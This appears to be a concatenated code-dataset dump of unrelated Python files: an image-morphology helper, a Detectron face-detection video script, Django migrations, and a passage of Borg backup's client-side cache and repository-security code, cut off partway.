] | 4 | 2020-07-31T02:35:21.000Z | 2021-07-29T23:03:39.000Z | ia870/ialastero.py | Abigale-Xin/e2dhipseg | 520366326cd20c75b5db855c9dd05cf0a8d49089 | [
"MIT"
] | 2 | 2020-07-28T22:29:54.000Z | 2021-07-07T20:37:25.000Z | ia870/ialastero.py | Abigale-Xin/e2dhipseg | 520366326cd20c75b5db855c9dd05cf0a8d49089 | [
"MIT"
] | 7 | 2020-07-27T05:22:03.000Z | 2022-03-10T06:29:21.000Z | # -*- encoding: utf-8 -*-
# Module ialastero
from numpy import *
from ia870.iasecross import iasecross
def ialastero(f, B=iasecross()):
from iaisbinary import iaisbinary
from iadist import iadist
from iaregmax import iaregmax
assert iaisbinary(f),'Can only process binary images'
dt = iadist(f,B)
y = iaregmax(dt,B)
return y
| 21 | 57 | 0.694678 |
412ac433c0496276da3d33aabeca3bc6fc8d0c12 | 9,210 | py | Python | tools/face/detect_video.py | AruniRC/detectron-self-train | a5d0edc51aeab92b953948ef2401294e87efb719 | [
"MIT"
] | 128 | 2019-04-12T17:06:27.000Z | 2022-02-26T10:24:43.000Z | tools/face/detect_video.py | AruniRC/detectron-self-train | a5d0edc51aeab92b953948ef2401294e87efb719 | [
"MIT"
] | 15 | 2019-06-12T03:55:48.000Z | 2021-03-12T07:09:53.000Z | tools/face/detect_video.py | AruniRC/detectron-self-train | a5d0edc51aeab92b953948ef2401294e87efb719 | [
"MIT"
] | 24 | 2019-04-12T17:06:30.000Z | 2021-07-12T12:38:20.000Z | #!/usr/bin/env python3
"""
Perform inference on frames from a video using Detectron saved checkpoint.
A symlink 'data/CS6' should point to the CS6 data root location
(on Gypsum this is in /mnt/nfs/scratch1/arunirc/data/CS6/CS6/CS6.0.01/CS6).
Usage (on slurm cluster):
srun --pty --mem 100000 --gres gpu:1 python tools/face/detect_video.py \
--vis --video_name 3004.mp4
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import distutils.util
import os
import sys
import pprint
import subprocess
from collections import defaultdict
from six.moves import xrange
import os.path as osp
import time
# Use a non-interactive backend
import matplotlib
matplotlib.use('Agg')
import numpy as np
import cv2
import skvideo
import skvideo.io
import torch
import torch.nn as nn
from torch.autograd import Variable
import sys
sys.path.append('./tools')
import _init_paths
import nn as mynn
from core.config import cfg, cfg_from_file, cfg_from_list, assert_and_infer_cfg
from core.test import im_detect_bbox
from modeling.model_builder import Generalized_RCNN
import datasets.dummy_datasets as datasets
import utils.boxes as box_utils # for NMS
import utils.misc as misc_utils
import utils.net as net_utils
import utils.vis as vis_utils
import utils.face_utils as face_utils
from utils.detectron_weight_helper import load_detectron_weight
# from utils.timer import Timer
# ---------------------------------------------------------------------------- #
# Change quick settings here:
# ---------------------------------------------------------------------------- #
# Baseline: trained on WIDER Face
# DET_NAME = 'frcnn-R-50-C4-1x'
# CFG_PATH = 'configs/wider_face/e2e_faster_rcnn_R-50-C4_1x.yaml'
# WT_PATH = 'Outputs/e2e_faster_rcnn_R-50-C4_1x/Jul30-15-51-27_node097_step/ckpt/model_step79999.pth'
# TRAIN_DATA = 'WIDER'
# CONF_THRESH = 0.25
CONF_THRESH = 0.1
NMS_THRESH = 0.15
## --- CS6 + WIDER Joint training [distill branch] ---
DET_NAME = 'frcnn-R-50-C4-1x'
TRAIN_IMDB = 'CS6-train-HP+WIDER-da-im_5k'
CFG_PATH = 'configs/cs6/e2e_faster_rcnn_R-50-C4_1x_domain_im.yaml'
WT_PATH = 'Outputs/e2e_faster_rcnn_R-50-C4_1x_domain_im/Oct06-23-57-55_node119_step/ckpt/model_step4999.pth'
OUT_DIR = 'Outputs/evaluations/%s/cs6/train-%s_val-easy_conf-%.2f' % (
DET_NAME, TRAIN_IMDB, CONF_THRESH)
VID_NAME = '600.mp4'
DATA_DIR = 'data/CS6'
# ---
def parse_args():
parser = argparse.ArgumentParser(description='Detectron inference on video')
parser.add_argument(
'--exp_name',
help='detector name',
default=DET_NAME
)
parser.add_argument(
'--cfg',
dest='cfg_file',
help='cfg model file (/path/to/model_prototxt)',
default=CFG_PATH,
type=str
)
parser.add_argument(
'--load_ckpt',
help='checkpoints weights model file (/path/to/model_weights.pkl)',
default=WT_PATH,
type=str
)
parser.add_argument(
'--load_detectron', help='path to the detectron weight pickle file'
)
parser.add_argument(
'--output-dir',
dest='output_dir',
help='directory for visualization pdfs (default: /tmp/infer_simple)',
default=OUT_DIR,
type=str
)
parser.add_argument(
'--no_cuda', dest='cuda', help='whether use CUDA',
action='store_false'
)
parser.add_argument(
'--thresh',
dest='thresh',
help='Threshold on class score (default: 0.5)',
default=CONF_THRESH,
type=float
)
parser.add_argument(
'--vis',
dest='vis',
help='Visualize detections on video frames option',
action='store_true',
default=False
)
# parser.add_argument(
# '--save_frame',
# dest='save_frame',
# help='Save the video frames that have detections',
# action='store_true',
# default=False
# )
parser.add_argument(
'--data_dir', help='Path to video file', default=DATA_DIR
)
parser.add_argument(
'--video_name', help='Name of video file', default=VID_NAME
)
return parser.parse_args()
_GREEN = (18, 127, 15)
# ------------------------------------------------------------------------------
def draw_detection_list(im, dets):
# ------------------------------------------------------------------------------
""" Draw detected bounding boxes on a copy of image and return it.
[x0 y0 w h conf_score]
"""
im_det = im.copy()
if dets.ndim == 1:
dets = dets[np.newaxis,:] # handle single detection case
# format into [xmin, ymin, xmax, ymax]
dets[:, 2] = dets[:, 2] + dets[:, 0]
dets[:, 3] = dets[:, 3] + dets[:, 1]
for i, det in enumerate(dets):
bbox = dets[i, :4]
conf_score = dets[i, 4]
x0, y0, x1, y1 = [int(x) for x in bbox]
line_color = _GREEN
cv2.rectangle(im_det, (x0, y0), (x1, y1), line_color, thickness=2)
disp_str = '%d: %.2f' % (i, conf_score)
face_utils._draw_string(im_det, (x0, y0), disp_str)
return im_det
if __name__ == '__main__':
if not torch.cuda.is_available():
sys.exit("Need a CUDA device to run the code.")
args = parse_args()
# args.output_dir = args.output_dir % args.exp_name
print('Called with args:')
print(args)
# Model setup
cfg.TEST.SCALE = 800
cfg.TEST.MAX_SIZE = 1333
cfg.MODEL.NUM_CLASSES = 2
cfg.TEST.NMS = NMS_THRESH
print('load cfg from file: {}'.format(args.cfg_file))
cfg_from_file(args.cfg_file)
assert bool(args.load_ckpt) ^ bool(args.load_detectron), \
'Exactly one of --load_ckpt and --load_detectron should be specified.'
cfg.MODEL.LOAD_IMAGENET_PRETRAINED_WEIGHTS = False
assert_and_infer_cfg()
net = Generalized_RCNN()
if args.cuda:
net.cuda()
if args.load_ckpt:
load_name = args.load_ckpt
print("loading checkpoint %s" % (load_name))
checkpoint = torch.load(load_name, map_location=lambda storage, loc: storage)
net_utils.load_ckpt(net, checkpoint['model'])
if args.load_detectron:
print("loading detectron weights %s" % args.load_detectron)
load_detectron_weight(net, args.load_detectron)
net = mynn.DataParallel(net, cpu_keywords=['im_info', 'roidb'],
minibatch=True, device_ids=[0]) # only support single GPU
net.eval()
# Data setup
video_path = osp.join(args.data_dir, 'videos', args.video_name)
if osp.exists(video_path):
videogen = skvideo.io.vreader(video_path)
else:
raise IOError('Path to video not found: \n%s' % video_path)
vid_name = osp.basename(video_path).split('.')[0]
if not osp.exists(args.output_dir):
os.makedirs(args.output_dir, exist_ok=True)
if args.vis:
img_output_dir = osp.join(args.output_dir, vid_name)
if not osp.exists(img_output_dir):
os.makedirs(img_output_dir, exist_ok=True)
# Detect faces on video frames
start = time.time()
with open(os.path.join(args.output_dir, vid_name + '.txt'), 'w') as fid:
det_list = []
for i, im in enumerate(videogen):
im_name = '%s_%08d' % (vid_name, i)
print(im_name)
im = im[:,:,(2,1,0)] # RGB --> BGR
# Detect faces and regress bounding-boxes
scores, boxes, im_scale, blob_conv = im_detect_bbox(
net, im, cfg.TEST.SCALE, cfg.TEST.MAX_SIZE)
cls_ind = 1
cls_boxes = boxes[:, 4*cls_ind:4*(cls_ind + 1)]
cls_scores = scores[:, cls_ind]
dets = np.hstack((cls_boxes,
cls_scores[:, np.newaxis])).astype(np.float32)
keep = box_utils.nms(dets, NMS_THRESH)
dets = dets[keep, :]
keep = np.where(dets[:, 4] > args.thresh)
dets = dets[keep]
# (x, y, w, h)
dets[:, 2] = dets[:, 2] - dets[:, 0] + 1
dets[:, 3] = dets[:, 3] - dets[:, 1] + 1
# Saving visualized frames
if args.vis:
viz_out_path = osp.join(img_output_dir, im_name + '.jpg')
if dets.size == 0: # nothing detected
if args.vis:
cv2.imwrite(viz_out_path, im)
else:
if args.vis:
im_det = draw_detection_list( im, dets.copy() )
cv2.imwrite(viz_out_path, im_det)
# Writing to text file
fid.write(im_name + '\n')
fid.write(str(dets.shape[0]) + '\n')
for j in xrange(dets.shape[0]):
fid.write('%f %f %f %f %f\n' % ( dets[j, 0], dets[j, 1],
dets[j, 2], dets[j, 3],
dets[j, 4]) )
# if ((i + 1) % 100) == 0:
# sys.stdout.write('%d ' % i)
# sys.stdout.flush()
end = time.time()
print('Execution time in seconds: %f' % (end - start))
| 30.39604 | 108 | 0.588274 |
3559e7c4ea30edd3eb10524698d9bf472150f4fb | 617 | py | Python | db/migrations/0010_language.py | matchd-ch/matchd-backend | 84be4aab1b4708cae50a8988301b15df877c8db0 | [
"Apache-2.0"
] | 1 | 2022-03-03T09:55:57.000Z | 2022-03-03T09:55:57.000Z | db/migrations/0010_language.py | matchd-ch/matchd-backend | 84be4aab1b4708cae50a8988301b15df877c8db0 | [
"Apache-2.0"
] | 7 | 2022-02-09T10:44:53.000Z | 2022-03-28T03:29:43.000Z | db/migrations/0010_language.py | matchd-ch/matchd-backend | 84be4aab1b4708cae50a8988301b15df877c8db0 | [
"Apache-2.0"
] | null | null | null | # Generated by Django 3.1.5 on 2021-02-03 10:00
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('db', '0009_skill'),
]
operations = [
migrations.CreateModel(
name='Language',
fields=[
('id',
models.AutoField(auto_created=True,
primary_key=True,
serialize=False,
verbose_name='ID')),
('name', models.CharField(max_length=255)),
],
),
]
| 24.68 | 59 | 0.45705 |
a0d8ebfdb6ad8323ad48626bc5b462508a9c4c2c | 489 | py | Python | api/idea_party/ideas/migrations/0004_auto_20200729_1520.py | nilq/idea-party | 08895399b72a6e735a2a6518feb205619c592ffe | [
"MIT"
] | null | null | null | api/idea_party/ideas/migrations/0004_auto_20200729_1520.py | nilq/idea-party | 08895399b72a6e735a2a6518feb205619c592ffe | [
"MIT"
] | null | null | null | api/idea_party/ideas/migrations/0004_auto_20200729_1520.py | nilq/idea-party | 08895399b72a6e735a2a6518feb205619c592ffe | [
"MIT"
] | null | null | null | # Generated by Django 3.0.8 on 2020-07-29 15:20
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('ideas', '0003_auto_20200729_1512'),
]
operations = [
migrations.AlterField(
model_name='idea',
name='parent',
field=models.ForeignKey(blank=True, default=None, on_delete=django.db.models.deletion.CASCADE, to='ideas.Idea'),
),
]
| 24.45 | 124 | 0.640082 |
dd3f1f196338485d5354da4f5ce2a19fdf578841 | 52,300 | py | Python | src/borg/cache.py | akozlins/borg | e4438227c1d235f1b631d400eebc22e11bb09e89 | [
"BSD-3-Clause"
] | null | null | null | src/borg/cache.py | akozlins/borg | e4438227c1d235f1b631d400eebc22e11bb09e89 | [
"BSD-3-Clause"
] | null | null | null | src/borg/cache.py | akozlins/borg | e4438227c1d235f1b631d400eebc22e11bb09e89 | [
"BSD-3-Clause"
] | null | null | null | import configparser
import os
import shutil
import stat
from binascii import unhexlify
from collections import namedtuple
from time import perf_counter
from .logger import create_logger
logger = create_logger()
from .constants import CACHE_README, DEFAULT_FILES_CACHE_MODE
from .hashindex import ChunkIndex, ChunkIndexEntry, CacheSynchronizer
from .helpers import Location
from .helpers import Error
from .helpers import Manifest
from .helpers import get_cache_dir, get_security_dir
from .helpers import int_to_bigint, bigint_to_int, bin_to_hex, parse_stringified_list
from .helpers import format_file_size
from .helpers import safe_ns
from .helpers import yes
from .helpers import remove_surrogates
from .helpers import ProgressIndicatorPercent, ProgressIndicatorMessage
from .helpers import set_ec, EXIT_WARNING
from .helpers import truncate_and_unlink
from .helpers import msgpack
from .item import ArchiveItem, ChunkListEntry
from .crypto.key import PlaintextKey
from .crypto.file_integrity import IntegrityCheckedFile, DetachedIntegrityCheckedFile, FileIntegrityError
from .locking import Lock
from .platform import SaveFile
from .remote import cache_if_remote
from .repository import LIST_SCAN_LIMIT
# note: cmtime might me either a ctime or a mtime timestamp
FileCacheEntry = namedtuple('FileCacheEntry', 'age inode size cmtime chunk_ids')
class SecurityManager:
"""
Tracks repositories. Ensures that nothing bad happens (repository swaps,
replay attacks, unknown repositories etc.).
This is complicated by the Cache being initially used for this, while
only some commands actually use the Cache, which meant that other commands
did not perform these checks.
Further complications were created by the Cache being a cache, so it
could be legitimately deleted, which is annoying because Borg didn't
recognize repositories after that.
Therefore a second location, the security database (see get_security_dir),
was introduced which stores this information. However, this means that
the code has to deal with a cache existing but no security DB entry,
or inconsistencies between the security DB and the cache which have to
be reconciled, and also with no cache existing but a security DB entry.
"""
def __init__(self, repository):
self.repository = repository
self.dir = get_security_dir(repository.id_str)
self.cache_dir = cache_dir(repository)
self.key_type_file = os.path.join(self.dir, 'key-type')
self.location_file = os.path.join(self.dir, 'location')
self.manifest_ts_file = os.path.join(self.dir, 'manifest-timestamp')
@staticmethod
def destroy(repository, path=None):
"""destroy the security dir for ``repository`` or at ``path``"""
path = path or get_security_dir(repository.id_str)
if os.path.exists(path):
shutil.rmtree(path)
def known(self):
return os.path.exists(self.key_type_file)
def key_matches(self, key):
if not self.known():
return False
try:
with open(self.key_type_file, 'r') as fd:
type = fd.read()
return type == str(key.TYPE)
except OSError as exc:
logger.warning('Could not read/parse key type file: %s', exc)
def save(self, manifest, key):
logger.debug('security: saving state for %s to %s', self.repository.id_str, self.dir)
current_location = self.repository._location.canonical_path()
logger.debug('security: current location %s', current_location)
logger.debug('security: key type %s', str(key.TYPE))
logger.debug('security: manifest timestamp %s', manifest.timestamp)
with SaveFile(self.location_file) as fd:
fd.write(current_location)
with SaveFile(self.key_type_file) as fd:
fd.write(str(key.TYPE))
with SaveFile(self.manifest_ts_file) as fd:
fd.write(manifest.timestamp)
def assert_location_matches(self, cache_config=None):
# Warn user before sending data to a relocated repository
try:
with open(self.location_file) as fd:
previous_location = fd.read()
logger.debug('security: read previous location %r', previous_location)
except FileNotFoundError:
logger.debug('security: previous location file %s not found', self.location_file)
previous_location = None
except OSError as exc:
logger.warning('Could not read previous location file: %s', exc)
previous_location = None
if cache_config and cache_config.previous_location and previous_location != cache_config.previous_location:
# Reconcile cache and security dir; we take the cache location.
previous_location = cache_config.previous_location
logger.debug('security: using previous_location of cache: %r', previous_location)
repository_location = self.repository._location.canonical_path()
if previous_location and previous_location != repository_location:
msg = ("Warning: The repository at location {} was previously located at {}\n".format(
repository_location, previous_location) +
"Do you want to continue? [yN] ")
if not yes(msg, false_msg="Aborting.", invalid_msg="Invalid answer, aborting.",
retry=False, env_var_override='BORG_RELOCATED_REPO_ACCESS_IS_OK'):
raise Cache.RepositoryAccessAborted()
# adapt on-disk config immediately if the new location was accepted
logger.debug('security: updating location stored in cache and security dir')
with SaveFile(self.location_file) as fd:
fd.write(repository_location)
if cache_config:
cache_config.save()
def assert_no_manifest_replay(self, manifest, key, cache_config=None):
try:
with open(self.manifest_ts_file) as fd:
timestamp = fd.read()
logger.debug('security: read manifest timestamp %r', timestamp)
except FileNotFoundError:
logger.debug('security: manifest timestamp file %s not found', self.manifest_ts_file)
timestamp = ''
except OSError as exc:
logger.warning('Could not read previous location file: %s', exc)
timestamp = ''
if cache_config:
timestamp = max(timestamp, cache_config.timestamp or '')
logger.debug('security: determined newest manifest timestamp as %s', timestamp)
# If repository is older than the cache or security dir something fishy is going on
if timestamp and timestamp > manifest.timestamp:
if isinstance(key, PlaintextKey):
raise Cache.RepositoryIDNotUnique()
else:
raise Cache.RepositoryReplay()
def assert_key_type(self, key, cache_config=None):
# Make sure an encrypted repository has not been swapped for an unencrypted repository
if cache_config and cache_config.key_type is not None and cache_config.key_type != str(key.TYPE):
raise Cache.EncryptionMethodMismatch()
if self.known() and not self.key_matches(key):
raise Cache.EncryptionMethodMismatch()
def assert_secure(self, manifest, key, *, cache_config=None, warn_if_unencrypted=True, lock_wait=None):
# warn_if_unencrypted=False is only used for initializing a new repository.
# Thus, avoiding asking about a repository that's currently initializing.
self.assert_access_unknown(warn_if_unencrypted, manifest, key)
if cache_config:
self._assert_secure(manifest, key, cache_config)
else:
cache_config = CacheConfig(self.repository, lock_wait=lock_wait)
if cache_config.exists():
with cache_config:
self._assert_secure(manifest, key, cache_config)
else:
self._assert_secure(manifest, key)
logger.debug('security: repository checks ok, allowing access')
def _assert_secure(self, manifest, key, cache_config=None):
self.assert_location_matches(cache_config)
self.assert_key_type(key, cache_config)
self.assert_no_manifest_replay(manifest, key, cache_config)
if not self.known():
logger.debug('security: remembering previously unknown repository')
self.save(manifest, key)
def assert_access_unknown(self, warn_if_unencrypted, manifest, key):
# warn_if_unencrypted=False is only used for initializing a new repository.
# Thus, avoiding asking about a repository that's currently initializing.
if not key.logically_encrypted and not self.known():
msg = ("Warning: Attempting to access a previously unknown unencrypted repository!\n" +
"Do you want to continue? [yN] ")
allow_access = not warn_if_unencrypted or yes(msg, false_msg="Aborting.",
invalid_msg="Invalid answer, aborting.",
retry=False, env_var_override='BORG_UNKNOWN_UNENCRYPTED_REPO_ACCESS_IS_OK')
if allow_access:
if warn_if_unencrypted:
logger.debug('security: remembering unknown unencrypted repository (explicitly allowed)')
else:
logger.debug('security: initializing unencrypted repository')
self.save(manifest, key)
else:
raise Cache.CacheInitAbortedError()
def assert_secure(repository, manifest, lock_wait):
sm = SecurityManager(repository)
sm.assert_secure(manifest, manifest.key, lock_wait=lock_wait)
def recanonicalize_relative_location(cache_location, repository):
# borg < 1.0.8rc1 had different canonicalization for the repo location (see #1655 and #1741).
repo_location = repository._location.canonical_path()
rl = Location(repo_location)
cl = Location(cache_location)
if cl.proto == rl.proto and cl.user == rl.user and cl.host == rl.host and cl.port == rl.port \
and \
cl.path and rl.path and \
cl.path.startswith('/~/') and rl.path.startswith('/./') and cl.path[3:] == rl.path[3:]:
# everything is same except the expected change in relative path canonicalization,
# update previous_location to avoid warning / user query about changed location:
return repo_location
else:
return cache_location
def cache_dir(repository, path=None):
return path or os.path.join(get_cache_dir(), repository.id_str)
class CacheConfig:
def __init__(self, repository, path=None, lock_wait=None):
self.repository = repository
self.path = cache_dir(repository, path)
self.config_path = os.path.join(self.path, 'config')
self.lock = None
self.lock_wait = lock_wait
def __enter__(self):
self.open()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
def exists(self):
return os.path.exists(self.config_path)
def create(self):
assert not self.exists()
config = configparser.ConfigParser(interpolation=None)
config.add_section('cache')
config.set('cache', 'version', '1')
config.set('cache', 'repository', self.repository.id_str)
config.set('cache', 'manifest', '')
config.add_section('integrity')
config.set('integrity', 'manifest', '')
with SaveFile(self.config_path) as fd:
config.write(fd)
def open(self):
self.lock = Lock(os.path.join(self.path, 'lock'), exclusive=True, timeout=self.lock_wait).acquire()
self.load()
def load(self):
self._config = configparser.ConfigParser(interpolation=None)
with open(self.config_path) as fd:
self._config.read_file(fd)
self._check_upgrade(self.config_path)
self.id = self._config.get('cache', 'repository')
self.manifest_id = unhexlify(self._config.get('cache', 'manifest'))
self.timestamp = self._config.get('cache', 'timestamp', fallback=None)
self.key_type = self._config.get('cache', 'key_type', fallback=None)
self.ignored_features = set(parse_stringified_list(self._config.get('cache', 'ignored_features', fallback='')))
self.mandatory_features = set(parse_stringified_list(self._config.get('cache', 'mandatory_features', fallback='')))
try:
self.integrity = dict(self._config.items('integrity'))
if self._config.get('cache', 'manifest') != self.integrity.pop('manifest'):
# The cache config file is updated (parsed with ConfigParser, the state of the ConfigParser
# is modified and then written out.), not re-created.
# Thus, older versions will leave our [integrity] section alone, making the section's data invalid.
# Therefore, we also add the manifest ID to this section and
# can discern whether an older version interfered by comparing the manifest IDs of this section
# and the main [cache] section.
self.integrity = {}
logger.warning('Cache integrity data not available: old Borg version modified the cache.')
except configparser.NoSectionError:
logger.debug('Cache integrity: No integrity data found (files, chunks). Cache is from old version.')
self.integrity = {}
previous_location = self._config.get('cache', 'previous_location', fallback=None)
if previous_location:
self.previous_location = recanonicalize_relative_location(previous_location, self.repository)
else:
self.previous_location = None
self._config.set('cache', 'previous_location', self.repository._location.canonical_path())
def save(self, manifest=None, key=None):
if manifest:
self._config.set('cache', 'manifest', manifest.id_str)
self._config.set('cache', 'timestamp', manifest.timestamp)
self._config.set('cache', 'ignored_features', ','.join(self.ignored_features))
self._config.set('cache', 'mandatory_features', ','.join(self.mandatory_features))
if not self._config.has_section('integrity'):
self._config.add_section('integrity')
for file, integrity_data in self.integrity.items():
self._config.set('integrity', file, integrity_data)
self._config.set('integrity', 'manifest', manifest.id_str)
if key:
self._config.set('cache', 'key_type', str(key.TYPE))
with SaveFile(self.config_path) as fd:
self._config.write(fd)
def close(self):
if self.lock is not None:
self.lock.release()
self.lock = None
def _check_upgrade(self, config_path):
try:
cache_version = self._config.getint('cache', 'version')
wanted_version = 1
if cache_version != wanted_version:
self.close()
raise Exception('%s has unexpected cache version %d (wanted: %d).' %
(config_path, cache_version, wanted_version))
except configparser.NoSectionError:
self.close()
raise Exception('%s does not look like a Borg cache.' % config_path) from None
class Cache:
"""Client Side cache
"""
class RepositoryIDNotUnique(Error):
"""Cache is newer than repository - do you have multiple, independently updated repos with same ID?"""
class RepositoryReplay(Error):
"""Cache, or information obtained from the security directory is newer than repository - this is either an attack or unsafe (multiple repos with same ID)"""
class CacheInitAbortedError(Error):
"""Cache initialization aborted"""
class RepositoryAccessAborted(Error):
"""Repository access aborted"""
class EncryptionMethodMismatch(Error):
"""Repository encryption method changed since last access, refusing to continue"""
@staticmethod
def break_lock(repository, path=None):
path = cache_dir(repository, path)
Lock(os.path.join(path, 'lock'), exclusive=True).break_lock()
@staticmethod
def destroy(repository, path=None):
"""destroy the cache for ``repository`` or at ``path``"""
path = path or os.path.join(get_cache_dir(), repository.id_str)
config = os.path.join(path, 'config')
if os.path.exists(config):
os.remove(config) # kill config first
shutil.rmtree(path)
def __new__(cls, repository, key, manifest, path=None, sync=True, warn_if_unencrypted=True,
progress=False, lock_wait=None, permit_adhoc_cache=False, cache_mode=DEFAULT_FILES_CACHE_MODE):
def local():
return LocalCache(repository=repository, key=key, manifest=manifest, path=path, sync=sync,
warn_if_unencrypted=warn_if_unencrypted, progress=progress,
lock_wait=lock_wait, cache_mode=cache_mode)
def adhoc():
return AdHocCache(repository=repository, key=key, manifest=manifest, lock_wait=lock_wait)
if not permit_adhoc_cache:
return local()
# ad-hoc cache may be permitted, but if the local cache is in sync it'd be stupid to invalidate
# it by needlessly using the ad-hoc cache.
# Check if the local cache exists and is in sync.
cache_config = CacheConfig(repository, path, lock_wait)
if cache_config.exists():
with cache_config:
cache_in_sync = cache_config.manifest_id == manifest.id
# Don't nest cache locks
if cache_in_sync:
# Local cache is in sync, use it
logger.debug('Cache: choosing local cache (in sync)')
return local()
logger.debug('Cache: choosing ad-hoc cache (local cache does not exist or is not in sync)')
return adhoc()
class CacheStatsMixin:
str_format = """\
All archives: {0.total_size:>20s} {0.total_csize:>20s} {0.unique_csize:>20s}
Unique chunks Total chunks
Chunk index: {0.total_unique_chunks:20d} {0.total_chunks:20d}"""
def __str__(self):
return self.str_format.format(self.format_tuple())
Summary = namedtuple('Summary', ['total_size', 'total_csize', 'unique_size', 'unique_csize', 'total_unique_chunks',
'total_chunks'])
def stats(self):
# XXX: this should really be moved down to `hashindex.pyx`
stats = self.Summary(*self.chunks.summarize())._asdict()
return stats
def format_tuple(self):
stats = self.stats()
for field in ['total_size', 'total_csize', 'unique_csize']:
stats[field] = format_file_size(stats[field])
return self.Summary(**stats)
def chunks_stored_size(self):
return self.stats()['unique_csize']
class LocalCache(CacheStatsMixin):
"""
Persistent, local (client-side) cache.
"""
def __init__(self, repository, key, manifest, path=None, sync=True, warn_if_unencrypted=True,
progress=False, lock_wait=None, cache_mode=DEFAULT_FILES_CACHE_MODE):
"""
:param warn_if_unencrypted: print warning if accessing unknown unencrypted repository
:param lock_wait: timeout for lock acquisition (int [s] or None [wait forever])
:param sync: do :meth:`.sync`
:param cache_mode: what shall be compared in the file stat infos vs. cached stat infos comparison
"""
self.repository = repository
self.key = key
self.manifest = manifest
self.progress = progress
self.cache_mode = cache_mode
self.timestamp = None
self.txn_active = False
self.path = cache_dir(repository, path)
self.security_manager = SecurityManager(repository)
self.cache_config = CacheConfig(self.repository, self.path, lock_wait)
# Warn user before sending data to a never seen before unencrypted repository
if not os.path.exists(self.path):
self.security_manager.assert_access_unknown(warn_if_unencrypted, manifest, key)
self.create()
self.open()
try:
self.security_manager.assert_secure(manifest, key, cache_config=self.cache_config)
if not self.check_cache_compatibility():
self.wipe_cache()
self.update_compatibility()
if sync and self.manifest.id != self.cache_config.manifest_id:
self.sync()
self.commit()
except:
self.close()
raise
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
def create(self):
"""Create a new empty cache at `self.path`
"""
os.makedirs(self.path)
with open(os.path.join(self.path, 'README'), 'w') as fd:
fd.write(CACHE_README)
self.cache_config.create()
ChunkIndex().write(os.path.join(self.path, 'chunks'))
os.makedirs(os.path.join(self.path, 'chunks.archive.d'))
with SaveFile(os.path.join(self.path, 'files'), binary=True):
pass # empty file
def _do_open(self):
self.cache_config.load()
with IntegrityCheckedFile(path=os.path.join(self.path, 'chunks'), write=False,
integrity_data=self.cache_config.integrity.get('chunks')) as fd:
self.chunks = ChunkIndex.read(fd)
if 'd' in self.cache_mode: # d(isabled)
self.files = None
else:
self._read_files()
def open(self):
if not os.path.isdir(self.path):
raise Exception('%s Does not look like a Borg cache' % self.path)
self.cache_config.open()
self.rollback()
def close(self):
if self.cache_config is not None:
self.cache_config.close()
self.cache_config = None
def _read_files(self):
self.files = {}
self._newest_cmtime = None
logger.debug('Reading files cache ...')
msg = None
try:
with IntegrityCheckedFile(path=os.path.join(self.path, 'files'), write=False,
integrity_data=self.cache_config.integrity.get('files')) as fd:
u = msgpack.Unpacker(use_list=True)
while True:
data = fd.read(64 * 1024)
if not data:
break
u.feed(data)
try:
for path_hash, item in u:
entry = FileCacheEntry(*item)
# in the end, this takes about 240 Bytes per file
self.files[path_hash] = msgpack.packb(entry._replace(age=entry.age + 1))
except (TypeError, ValueError) as exc:
msg = "The files cache seems invalid. [%s]" % str(exc)
break
except OSError as exc:
msg = "The files cache can't be read. [%s]" % str(exc)
except FileIntegrityError as fie:
msg = "The files cache is corrupted. [%s]" % str(fie)
if msg is not None:
logger.warning(msg)
logger.warning('Continuing without files cache - expect lower performance.')
self.files = {}
def begin_txn(self):
# Initialize transaction snapshot
pi = ProgressIndicatorMessage(msgid='cache.begin_transaction')
txn_dir = os.path.join(self.path, 'txn.tmp')
os.mkdir(txn_dir)
pi.output('Initializing cache transaction: Reading config')
shutil.copy(os.path.join(self.path, 'config'), txn_dir)
pi.output('Initializing cache transaction: Reading chunks')
shutil.copy(os.path.join(self.path, 'chunks'), txn_dir)
pi.output('Initializing cache transaction: Reading files')
shutil.copy(os.path.join(self.path, 'files'), txn_dir)
os.rename(os.path.join(self.path, 'txn.tmp'),
os.path.join(self.path, 'txn.active'))
self.txn_active = True
pi.finish()
def commit(self):
"""Commit transaction
"""
if not self.txn_active:
return
self.security_manager.save(self.manifest, self.key)
pi = ProgressIndicatorMessage(msgid='cache.commit')
if self.files is not None:
if self._newest_cmtime is None:
# was never set because no files were modified/added
self._newest_cmtime = 2 ** 63 - 1 # nanoseconds, good until y2262
ttl = int(os.environ.get('BORG_FILES_CACHE_TTL', 20))
pi.output('Saving files cache')
with IntegrityCheckedFile(path=os.path.join(self.path, 'files'), write=True) as fd:
for path_hash, item in self.files.items():
# Only keep files seen in this backup that are older than newest cmtime seen in this backup -
# this is to avoid issues with filesystem snapshots and cmtime granularity.
# Also keep files from older backups that have not reached BORG_FILES_CACHE_TTL yet.
entry = FileCacheEntry(*msgpack.unpackb(item))
if entry.age == 0 and bigint_to_int(entry.cmtime) < self._newest_cmtime or \
entry.age > 0 and entry.age < ttl:
msgpack.pack((path_hash, entry), fd)
self.cache_config.integrity['files'] = fd.integrity_data
pi.output('Saving chunks cache')
with IntegrityCheckedFile(path=os.path.join(self.path, 'chunks'), write=True) as fd:
self.chunks.write(fd)
self.cache_config.integrity['chunks'] = fd.integrity_data
pi.output('Saving cache config')
self.cache_config.save(self.manifest, self.key)
os.rename(os.path.join(self.path, 'txn.active'),
os.path.join(self.path, 'txn.tmp'))
shutil.rmtree(os.path.join(self.path, 'txn.tmp'))
self.txn_active = False
pi.finish()
def rollback(self):
"""Roll back partial and aborted transactions
"""
# Remove partial transaction
if os.path.exists(os.path.join(self.path, 'txn.tmp')):
shutil.rmtree(os.path.join(self.path, 'txn.tmp'))
# Roll back active transaction
txn_dir = os.path.join(self.path, 'txn.active')
if os.path.exists(txn_dir):
shutil.copy(os.path.join(txn_dir, 'config'), self.path)
shutil.copy(os.path.join(txn_dir, 'chunks'), self.path)
shutil.copy(os.path.join(txn_dir, 'files'), self.path)
os.rename(txn_dir, os.path.join(self.path, 'txn.tmp'))
if os.path.exists(os.path.join(self.path, 'txn.tmp')):
shutil.rmtree(os.path.join(self.path, 'txn.tmp'))
self.txn_active = False
self._do_open()
def sync(self):
"""Re-synchronize chunks cache with repository.
Maintains a directory with known backup archive indexes, so it only
needs to fetch infos from repo and build a chunk index once per backup
archive.
If out of sync, missing archive indexes get added, outdated indexes
